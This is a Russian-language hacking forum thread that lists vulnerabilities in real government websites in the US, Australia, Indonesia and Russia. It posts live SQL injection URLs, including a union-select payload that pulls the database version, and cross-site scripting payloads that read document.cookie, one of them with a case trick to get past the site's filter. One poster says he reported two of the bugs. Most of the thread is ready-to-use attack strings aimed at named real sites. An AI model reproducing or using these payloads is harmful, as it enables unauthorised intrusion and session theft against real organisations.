уязвимости гос. учреждений

[el-]

департамент здравоохранения калифорнии, чего то там ...

hxxp://www.westnile.ca.gov/downloads.php?download_id=268'+order+by+10--

сайт примьер министра южной австралии

hxxp://www.premier.sa.gov.au/news.php?id=3476+and+1=1/*

национальный ... чего то там ... индонезии

hxxp://www.tni.mil.id/news.php?q=dtl&id=99999239'+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*

 

[Одинокий Волк]

Ггг... как всё банально и просто... первый цмска какая-то знакомый скул..

 

[profeto]

Passive XSS на одном из сайтов ФБР.

http://fbijobs.gov

Недостаточная фильтрация входящих данных в поиске (searchresult.asp; POST-параметр SearchString).

<Scri pt>alert(document.cookie);</Script>

Учитывайте регистр, просто <script> режется =\

--

UPD: Багрепорт отправил, скоро думаю пофиксят.

UPD2: Пришел ответ

Thank you for bringing this to our attention. I will pass it along to
the appropriate individuals.

IC3 Tech Support

 

[profeto]

Оф.сайт единой России, активная XSS.

http://edinros.er.ru/er/search.shtml?r=8&ss=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%21%2D%2D%2D

Обнаружена вместе с парой более серьезных дырок еще в марте. Собственно, отписывался им, пофиксили все, кроме этой.